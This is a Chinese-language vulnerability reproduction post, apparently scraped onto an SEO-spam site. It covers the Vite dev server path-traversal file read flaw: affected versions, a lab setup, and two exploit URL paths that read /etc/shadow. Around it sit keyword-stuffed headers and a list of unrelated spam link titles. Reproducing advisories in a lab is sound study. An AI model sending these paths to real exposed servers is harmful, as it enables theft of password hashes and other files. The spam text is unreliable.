当前位置: 首页 > wzjs >正文

百度快照入口国外seo大神

wzjs 2025/7/29 21:04:40
百度快照入口,国外seo大神,网站seo优化有哪些方面,长沙互联网大厂漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/143387.html

相关文章:

  • 自己怎样做优惠券网站代发关键词排名包收录
  • 百度餐饮网站建设加速游戏流畅的软件
  • 服装网站制作百度电话人工服务
  • 广州美容网站建设百度快照入口
  • 竹子建站教程谷歌google官网下载
  • 哈尔滨市建筑企业管理站seo岗位职责
  • 成都网站建设快速服务百度营销推广登录平台
  • 搜狐一开始把网站当做什么来做我在百度下的订单如何查询
  • 网站注册信息查询写一篇软文推广自己的学校
  • 凡客app官网新河seo怎么做整站排名
  • 番禺有经验的网站建设温州seo顾问
  • wordpress模板大前端青岛seo计费
  • 浦东网站制作怎么注册网站免费的
  • 域名归属查询流程优化四个方法
  • 手工网站怎样做三角包免费做网站
  • 一个网络空间做两个网站香港疫情最新消息
  • 佛山网站制作哪里实惠西安seo关键词排名优化
  • wap网站psd网站首页布局设计模板
  • 注册网站免费注册ins程序员培训机构排名
  • 网站登录系统怎样做杭州seo排名公司
  • 交友网站开发的意义推特是谁的公司
  • 外国 网站模板网络营销教案ppt
  • 郑州网站推广优化报价个人小白如何做手游代理
  • 做外贸必应网站产品曝光沧州百度推广总代理
  • 做网站安全联盟解百度贴吧网页版
  • 用php做的单车租赁网站怎么注册一个自己的网站
  • 北京网站开发需要多少钱如何做谷歌优化
  • 哈尔滨建设网证照查询网络公司优化关键词
  • 溧阳市建设局网站6软件推广
  • 聂教练做0网站网站推广排名教程